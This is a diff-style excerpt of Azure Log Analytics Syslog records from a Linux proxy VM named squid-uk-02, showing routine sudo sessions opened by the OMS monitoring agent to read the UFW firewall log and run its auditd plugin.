+68,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:00,squid-uk-02,7/8/2019 15:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+69,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:00,squid-uk-02,7/8/2019 15:00,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+70,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:00,squid-uk-02,7/8/2019 15:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+71,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:00,squid-uk-02,7/8/2019 15:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+72,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:00,squid-uk-02,7/8/2019 15:00,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x   USER=root   COMMAND=/opt/microsoft/omsconfig/Scripts/OMSAuditdPlugin.sh get /var/opt/microsoft/omsagent/b1315f05-4a7a-45b4-811f-73e715f7c122/tmp,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+73,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:00,squid-uk-02,7/8/2019 15:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+78,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:01,squid-uk-02,7/8/2019 15:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+79,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:01,squid-uk-02,7/8/2019 15:01,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+80,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:01,squid-uk-02,7/8/2019 15:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+84,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:10,squid-uk-02,7/8/2019 15:10,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+85,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:10,squid-uk-02,7/8/2019 15:10,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+86,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:10,squid-uk-02,7/8/2019 15:10,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+90,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:11,squid-uk-02,7/8/2019 15:11,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+91,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:11,squid-uk-02,7/8/2019 15:11,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+92,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:11,squid-uk-02,7/8/2019 15:11,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+96,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:12,squid-uk-02,7/8/2019 15:12,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+97,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:12,squid-uk-02,7/8/2019 15:12,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+98,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:12,squid-uk-02,7/8/2019 15:12,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:13,squid-uk-02,7/8/2019 15:13,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:13,squid-uk-02,7/8/2019 15:13,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:13,squid-uk-02,7/8/2019 15:13,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:16,squid-uk-02,7/8/2019 15:16,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:16,squid-uk-02,7/8/2019 15:16,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:16,squid-uk-02,7/8/2019 15:16,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:17,squid-uk-02,7/8/2019 15:17,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:17,squid-uk-02,7/8/2019 15:17,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:17,squid-uk-02,7/8/2019 15:17,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:18,squid-uk-02,7/8/2019 15:18,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:18,squid-uk-02,7/8/2019 15:18,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:18,squid-uk-02,7/8/2019 15:18,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:19,squid-uk-02,7/8/2019 15:19,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:19,squid-uk-02,7/8/2019 15:19,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:19,squid-uk-02,7/8/2019 15:19,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:25,squid-uk-02,7/8/2019 15:25,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:25,squid-uk-02,7/8/2019 15:25,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:25,squid-uk-02,7/8/2019 15:25,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:26,squid-uk-02,7/8/2019 15:26,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:26,squid-uk-02,7/8/2019 15:26,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:26,squid-uk-02,7/8/2019 15:26,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:37,squid-uk-02,7/8/2019 15:37,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:37,squid-uk-02,7/8/2019 15:37,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:37,squid-uk-02,7/8/2019 15:37,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:38,squid-uk-02,7/8/2019 15:38,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:38,squid-uk-02,7/8/2019 15:38,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:38,squid-uk-02,7/8/2019 15:38,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:39,squid-uk-02,7/8/2019 15:39,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:39,squid-uk-02,7/8/2019 15:39,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:39,squid-uk-02,7/8/2019 15:39,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:40,squid-uk-02,7/8/2019 15:40,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:40,squid-uk-02,7/8/2019 15:40,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:40,squid-uk-02,7/8/2019 15:40,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:47,squid-uk-02,7/8/2019 15:47,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:47,squid-uk-02,7/8/2019 15:47,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:47,squid-uk-02,7/8/2019 15:47,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:48,squid-uk-02,7/8/2019 15:48,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:48,squid-uk-02,7/8/2019 15:48,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:48,squid-uk-02,7/8/2019 15:48,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:51,squid-uk-02,7/8/2019 15:51,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 15:51,squid-uk-02,7/8/2019 15:51,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
